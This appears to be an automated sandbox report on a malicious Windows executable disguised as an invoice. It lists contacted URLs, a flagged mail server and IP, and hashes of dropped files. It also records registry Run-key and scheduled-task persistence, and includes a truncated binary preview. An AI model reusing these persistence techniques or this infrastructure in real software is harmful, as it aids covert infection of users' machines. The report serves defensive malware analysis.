            http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
            http://fontfabrik.com | 0% | URL Reputation | safe
            http://www.fontbureau.comalicCC | 0% | Avira URL Cloud | safe
            http://www.fonts.comic | 0% | URL Reputation | safe
            http://www.founder.com.cn/cnl | 0% | URL Reputation | safe
            http://www.fontbureau.comaCC | 0% | Avira URL Cloud | safe
            http://DynDns.comDynDNSnamejidpasswordPsi/Psi | 0% | URL Reputation | safe
            http://www.fonts.comn | 0% | URL Reputation | safe
            http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
            http://www.sandoll.co.kr | 0% | URL Reputation | safe
            http://www.urwpp.deDPlease | 0% | URL Reputation | safe
            http://www.founder.com.cn/cnl-s | 0% | URL Reputation | safe
            http://www.urwpp.de | 0% | URL Reputation | safe
            http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
            https://Vvf6edm0NHgn8Mct.com | 0% | Avira URL Cloud | safe
            http://www.sakkal.com | 0% | URL Reputation | safe
            http://www.fontbureau.comueed | 0% | URL Reputation | safe
            http://www.fontbureau.comalsd | 0% | URL Reputation | safe
            http://www.founder.com.cn/cnr-f | 0% | URL Reputation | safe
            http://www.fontbureau.comF | 0% | URL Reputation | safe
            http://www.fontbureau.comcom/pC | 0% | Avira URL Cloud | safe
            http://www.agfamonotype. | 0% | URL Reputation | safe
            http://www.fonts.comn-u | 0% | URL Reputation | safe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www | 0% | URL Reputation | safe
            http://www.founder.com.cn/cn/cr%X | 0% | Avira URL Cloud | safe
            http://www.tiro.comlic | 0% | URL Reputation | safe
            http://www.sandoll.co.kre | 0% | URL Reputation | safe
            http://www.fontbureau.coma | 0% | URL Reputation | safe
            http://www.fontbureau.come.com | 0% | URL Reputation | safe
            http://www.microft.c | 0% | Avira URL Cloud | safe
            http://www.carterandcone.coml | 0% | URL Reputation | safe
            http://www.founder.com.cn/cn | 0% | URL Reputation | safe
            http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
            http://www.sajatypeworks.comdif | 0% | Avira URL Cloud | safe
            http://mail.oceanskylogistics.in | 0% | Avira URL Cloud | safe
            http://www.carterandcone.comand | 0% | URL Reputation | safe
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            mail.oceanskylogistics.in | 43.255.154.57 | true | true | | unknown
            Name | Source | Malicious | Antivirus Detection | Reputation
            http://127.0.0.1:HTTP/1.1 | RegSvcs.exe, 0000000E.00000002.537876981.0000000003511000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
            http://www.fontbureau.com/designersG | INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://www.fontbureau.com/designers/? | INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://www.founder.com.cn/cn/bThe | INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://www.fontbureau.com/designers? | INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://www.fontbureau.com.C | INVOICE OUTSTANDING.exe, 00000000.00000003.269917714.0000000005D99000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.monotype.K | INVOICE OUTSTANDING.exe, 00000000.00000003.274775393.0000000005D9A000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.274864897.0000000005D9A000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://wITvjB.com | RegSvcs.exe, 0000000E.00000002.537876981.0000000003511000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.tiro.com | INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258837182.0000000005DAB000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258983594.0000000005DAB000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258921299.0000000005DAB000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://www.fontbureau.com/designers | INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://www.fontbureau.comessed | INVOICE OUTSTANDING.exe, 00000000.00000003.267953980.0000000005D99000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://www.goodfont.co.kr | INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://www.carterandcone.com | INVOICE OUTSTANDING.exe, 00000000.00000003.264428534.0000000005D9D000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.263804833.0000000005D9D000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.264182537.0000000005D9D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://www.sajatypeworks.com | INVOICE OUTSTANDING.exe, 00000000.00000003.258362405.0000000005DB3000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.257901573.0000000005DB3000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.257875244.0000000005DB2000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258530065.0000000005DB3000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://www.typography.netD | INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://www.founder.com.cn/cn/cThe | INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://www.galapagosdesign.com/staff/dennis.htm | INVOICE OUTSTANDING.exe, 00000000.00000003.274775393.0000000005D9A000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.273884816.0000000005D99000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.274864897.0000000005D9A000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.274960497.0000000005D9A000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.275003587.0000000005D9A000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://fontfabrik.com | INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://www.fontbureau.comalicCC | INVOICE OUTSTANDING.exe, 00000000.00000003.269917714.0000000005D99000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.fonts.comic | INVOICE OUTSTANDING.exe, 00000000.00000003.258155841.0000000005DAB000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://www.founder.com.cn/cnl | INVOICE OUTSTANDING.exe, 00000000.00000003.261791694.0000000005D99000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.261227330.0000000005D94000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.261899825.0000000005D9B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://www.fontbureau.comaCC | INVOICE OUTSTANDING.exe, 00000000.00000003.322102237.0000000005D90000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000002.347616586.0000000005D9A000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://DynDns.comDynDNSnamejidpasswordPsi/Psi | RegSvcs.exe, 0000000E.00000002.537876981.0000000003511000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://www.fonts.comn | INVOICE OUTSTANDING.exe, 00000000.00000003.258239730.0000000005DAB000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://www.galapagosdesign.com/DPlease | INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://www.fonts.com | INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258250097.0000000005DB4000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258179215.0000000005DB4000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://www.sandoll.co.kr | INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.260100666.0000000005D99000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://www.urwpp.deDPlease | INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://www.founder.com.cn/cnl-s | INVOICE OUTSTANDING.exe, 00000000.00000003.261182333.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://www.urwpp.de | INVOICE OUTSTANDING.exe, 00000000.00000003.269917714.0000000005D99000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://www.zhongyicts.com.cn | INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://Vvf6edm0NHgn8Mct.com | RegSvcs.exe, 0000000E.00000002.545492635.000000000386C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | INVOICE OUTSTANDING.exe, 00000000.00000002.334218566.0000000002E75000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://www.sakkal.com | INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://www.fontbureau.comueed | INVOICE OUTSTANDING.exe, 00000000.00000003.267953980.0000000005D99000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://www.fontbureau.comalsd | INVOICE OUTSTANDING.exe, 00000000.00000003.269917714.0000000005D99000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://www.founder.com.cn/cnr-f | INVOICE OUTSTANDING.exe, 00000000.00000003.261182333.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://www.apache.org/licenses/LICENSE-2.0 | INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://www.fontbureau.com | INVOICE OUTSTANDING.exe, 00000000.00000003.267953980.0000000005D99000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.269917714.0000000005D99000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.268522512.0000000005D9A000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://www.fontbureau.comF | INVOICE OUTSTANDING.exe, 00000000.00000003.267953980.0000000005D99000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.269917714.0000000005D99000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.268522512.0000000005D9A000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://www.fontbureau.comcom/pC | INVOICE OUTSTANDING.exe, 00000000.00000003.269917714.0000000005D99000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.agfamonotype. | INVOICE OUTSTANDING.exe, 00000000.00000003.275083576.0000000005DA4000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://www.fonts.comn-u | INVOICE OUTSTANDING.exe, 00000000.00000003.258250097.0000000005DB4000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www | RegSvcs.exe, 0000000E.00000002.537876981.0000000003511000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://www.founder.com.cn/cn/cr%X | INVOICE OUTSTANDING.exe, 00000000.00000003.261782172.0000000005D94000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.tiro.comlic | INVOICE OUTSTANDING.exe, 00000000.00000003.258837182.0000000005DAB000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://www.sandoll.co.kre | INVOICE OUTSTANDING.exe, 00000000.00000003.260100666.0000000005D99000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://www.fontbureau.coma | INVOICE OUTSTANDING.exe, 00000000.00000003.267953980.0000000005D99000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://www.fontbureau.come.com | INVOICE OUTSTANDING.exe, 00000000.00000003.322102237.0000000005D90000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000002.347616586.0000000005D9A000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://www.microft.c | RegSvcs.exe, 0000000E.00000003.362147300.00000000067C1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.carterandcone.coml | INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://www.fontbureau.com/designers/cabarga.htmlM | INVOICE OUTSTANDING.exe, 00000000.00000003.268670914.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp | false
                              high
                              http://www.fontbureau.com/designers/cabarga.htmlNINVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.founder.com.cn/cnINVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.261791694.0000000005D99000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.261227330.0000000005D94000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.261899825.0000000005D9B000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.261182333.0000000005DCD000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.fontbureau.com/designers/frere-jones.htmlINVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.fontbureau.com/designers/cabarga.htmlINVOICE OUTSTANDING.exe, 00000000.00000003.268824829.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.268851153.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.268670914.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.268730021.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.268758763.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.268943050.0000000005DCD000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.fontbureau.com/pCINVOICE OUTSTANDING.exe, 00000000.00000003.267953980.0000000005D99000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.267043053.0000000005D98000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.268522512.0000000005D9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.jiyu-kobo.co.jp/INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.fontbureau.com/designers8INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.sajatypeworks.comdifINVOICE OUTSTANDING.exe, 00000000.00000003.257901573.0000000005DB3000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258048117.0000000005DB4000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.257978730.0000000005DB4000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258250097.0000000005DB4000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.257944160.0000000005DB4000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258298723.0000000005DB4000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258070392.0000000005DB4000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.257875244.0000000005DB2000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258179215.0000000005DB4000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://mail.oceanskylogistics.inRegSvcs.exe, 0000000E.00000002.545492635.000000000386C000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.carterandcone.comandINVOICE OUTSTANDING.exe, 00000000.00000003.264428534.0000000005D9D000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.263804833.0000000005D9D000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.264182537.0000000005D9D000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
Map legend: No. of IPs < 25%; 25% < No. of IPs < 50%; 50% < No. of IPs < 75%; 75% < No. of IPs

IP | Domain | Country | ASN | ASN Name | Malicious
43.255.154.57 | mail.oceanskylogistics.in | Singapore | 26496 | AS-26496-GO-DADDY-COM-LLCUS | true
Joe Sandbox Version: 35.0.0 Citrine
Analysis ID: 680571
Start date and time: 2022-08-08 20:18:10 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 8m 30s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: INVOICE OUTSTANDING.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 30
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.adwa.spyw.evad.winEXE@11/8@1/1
EGA Information:
• Successful, ratio: 100%
HDC Information: Failed
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .exe
• Adjust boot time
• Enable AMSI
• Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
• Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, ctldl.windowsupdate.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
• Not all processes were analyzed; report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
20:20:23 | API Interceptor | 1x Sleep call for process: INVOICE OUTSTANDING.exe modified
20:20:50 | API Interceptor | 541x Sleep call for process: RegSvcs.exe modified
20:20:54 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run kECjS C:\Users\user\AppData\Roaming\kECjS\kECjS.exe
20:21:02 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run kECjS C:\Users\user\AppData\Roaming\kECjS\kECjS.exe
                                        No context
                                        Process:C:\Users\user\Desktop\INVOICE OUTSTANDING.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1216
                                        Entropy (8bit):5.355304211458859
                                        Encrypted:false
                                        SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
                                        MD5:69206D3AF7D6EFD08F4B4726998856D3
                                        SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
                                        SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
                                        SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
                                        Malicious:true
                                        Reputation:high, very likely benign file
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                        Process:C:\Users\user\AppData\Roaming\kECjS\kECjS.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:modified
                                        Size (bytes):142
                                        Entropy (8bit):5.090621108356562
                                        Encrypted:false
                                        SSDEEP:3:QHXMKa/xwwUC7WglAFXMWA2yTMGfsbNRLFS9Am12MFuAvOAsDeieVyn:Q3La/xwczlAFXMWTyAGCDLIP12MUAvvw
                                        MD5:8C0458BB9EA02D50565175E38D577E35
                                        SHA1:F0B50702CD6470F3C17D637908F83212FDBDB2F2
                                        SHA-256:C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
                                        SHA-512:804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
                                        Malicious:false
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                        Process:C:\Users\user\Desktop\INVOICE OUTSTANDING.exe
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1642
                                        Entropy (8bit):5.1822034700146205
                                        Encrypted:false
                                        SSDEEP:24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBJYtn:cbh47TlNQ//rydbz9I3YODOLNdq3S
                                        MD5:2B04C027DCB9FF6FBBB8566586DA0617
                                        SHA1:A349F8FD51F9D28B0F35CEDD9FFA14A608C419B6
                                        SHA-256:E0C5C7F2EAC8081C8BF375CE293F7426421D9EDB7873ADFD14B3D851B7208252
                                        SHA-512:15B6E73A6D0ED9F862D331AA04E76302DC905FF9D9022AE883B17F598BB7919913F44771807CBA1830035646E23031993D1DED132E807CC60321DB33435B9AC9
                                        Malicious:true
                                        Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                                        Process:C:\Users\user\Desktop\INVOICE OUTSTANDING.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):1031168
                                        Entropy (8bit):7.486735500072679
                                        Encrypted:false
                                        SSDEEP:24576:ru18pEJHoMv9vxksAEtn1vH2sP6BqoFi/ep:iipE1oMvPpCsVcpp
                                        MD5:0FA9D94D6393235F67A17B220902DBFA
                                        SHA1:3C0AE56AB072F622DA13806B4336F01F7137EE4C
                                        SHA-256:65EA111F533E1283B202B87434EA207410C1680EADC9B2193C76179EB87DECFC
                                        SHA-512:1C2D817ADDC45161E63667895E1C54306E5F8F27F4804D6D7A06163B62451B3189E7FA6608B24BB7DD8969B23285286E82750351F1322B2714A31546FAB9B5C5
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 38%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b..............P.............V.... ........@.. ....................... ............@.....................................O.................................................................................... ............... ..H............text...\.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................8.......H.......8~..\H..............p.............................................( ...*&..(!....*.s"........s#........s$........s%........s&........*...0...........~....o'....+..*.0...........~....o(....+..*.0...........~....o)....+..*.0...........~....o*....+..*.0...........~....o+....+..*.0..<........~.....(,.....,!r...p.....(-...o....s/............~.....+..*.0...........~.....+..*".......*.0..&........(....r5..p~....o0...(1.....t$....+..*...0..&........(....rC..p~....o0...(1.....
                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:modified
                                        Size (bytes):45152
                                        Entropy (8bit):6.149629800481177
                                        Encrypted:false
                                        SSDEEP:768:bBbSoy+SdIBf0k2dsYyV6Iq87PiU9FViaLmf:EoOIBf0ddsYy8LUjVBC
                                        MD5:2867A3817C9245F7CF518524DFD18F28
                                        SHA1:D7BA2A111CEDD5BF523224B3F1CFE58EEC7C2FDC
                                        SHA-256:43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50
                                        SHA-512:7D3D3DBB42B7966644D716AA9CBC75327B2ACB02E43C61F1DAD4AFE5521F9FE248B33347DFE15B637FB33EB97CDB322BCAEAE08BAE3F2FD863A9AD9B3A4D6B42
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Metadefender, Detection: 0%, Browse
                                        • Antivirus: ReversingLabs, Detection: 0%
